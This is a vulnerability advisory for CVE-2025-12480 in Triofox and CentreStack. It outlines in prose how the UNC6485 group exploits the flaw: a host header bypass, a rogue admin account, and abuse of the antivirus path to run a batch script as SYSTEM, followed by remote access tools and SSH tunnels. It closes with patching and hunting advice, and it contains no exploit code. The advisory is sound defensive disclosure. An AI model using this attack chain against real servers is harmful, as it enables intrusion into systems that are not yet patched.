CVE-2025-12480

Name of the Vulnerable Software and Affected Versions Triofox versions prior to 16.7.10368.56560 CentreStack versions prior to 12.10.59

Description Triofox and CentreStack are vulnerable to an Improper Access Control flaw that allows unauthenticated attackers to gain access to application configuration pages. This allows for the upload and execution of arbitrary payloads on the server. The vulnerability, designated CVE-2025-12480, is actively being exploited by the UNC6485 threat group. Attackers are chaining this flaw with the Triofox built-in antivirus scanning feature to achieve remote code execution (RCE). Specifically, attackers create an administrative account and configure the antivirus path to execute malicious scripts, such as

centre report.bat

, with SYSTEM-level privileges. This enables the deployment of remote access tools like Zoho Assist, AnyDesk, and Plink for persistent access and reconnaissance. The exploitation involves renaming executable files (e.g., sihosts.exe, silcon.exe) to evade detection and establishing SSH tunnels. The initial access is gained through a host header bypass, allowing attackers to bypass authentication.

Recommendations Update to Triofox version 16.7.10368.56560. Update to CentreStack version 12.10.59. Audit existing admin accounts. Verify that the antivirus feature is not configured to execute unauthorized scripts. Monitor outbound SSH traffic for suspicious activity. Implement hunting queries to detect artifacts associated with this attack methodology.